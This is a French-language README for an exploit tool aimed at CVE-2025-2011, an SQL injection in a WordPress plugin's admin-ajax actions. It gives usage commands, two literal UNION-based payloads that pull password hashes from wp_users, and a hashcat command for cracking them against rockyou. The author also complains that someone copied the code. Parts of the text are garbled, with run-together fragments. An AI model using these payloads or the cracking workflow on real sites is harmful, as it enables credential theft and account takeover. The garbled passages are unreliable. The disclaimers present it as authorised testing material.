
Exploit for CVE-2025-2011
Par : X3RX3S Mais fièrement arraché par Ash Wesker qui a utilisé GPT sur mon code avec sa bannière ;) voir ici ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Vous pouvez même voir mon pseudo dans 'son' code -_-'
Objectif : Un outil de preuve de concept pour tester une vulnérabilité d'injection SQL (CVE-2025-2011) contre des sites WordPress.
Avertissement : Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. Les tests non autorisés sont illégaux et contraires à l'éthique.

-p 1 ou -p 2)$2a$, $2b$, $2y$), y compris les variantes préfixées par $wp$results_<hostname>.txt-m 3200) avec une invite-u) ou plusieurs cibles via un fichier (-f)requestscoloramaInstaller les dépendances :
pip install requests colorama
Optionnel (pour le craquage) :
hashcat installé et disponible dans votre PATH (Par défaut /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txtRendre le script exécutable (optionnel) :
chmod +x CVE-2025-2011.py
Cible unique (payload 1 par défaut) :
python3 CVE-2025-2011.py -u https://example.com
Cible unique (payload 2) :
python3 CVE-2025-2011.py -u https://example.com -p 2
Plusieurs cibles à partir d'un fichier (une URL par ligne) :
python3 CVE-2025-2011.py -f targets.txt
Pour chaque hôte testé, le script enregistre un fichier de résultat :
results_<hostname>.txt
Si des hachages bcrypt sont trouvés, ils sont sauvegardés dans hashes.txt et vous serez invité à les casser avec Hashcat. Exemple de commande Hashcat utilisée par le script :
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Note : bcrypt est lent par conception. Le craquage peut prendre beaucoup de temps et nécessiter des GPU.
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
Cet outil est fourni à des fins éducatives et défensives uniquement. Ne l'utilisez pas contre des systèmes pour lesquels vous n'avez pas d'autorisation explicite. L'auteur et le distributeur déclinent toute responsabilité en cas d'utilisation abusive. Obtenez toujours une autorisation écrite avant d'effectuer des tests contre des cibles qui ne vous appartiennent pas.
run_hashcat dans le script pour pointer vers votre liste préférée.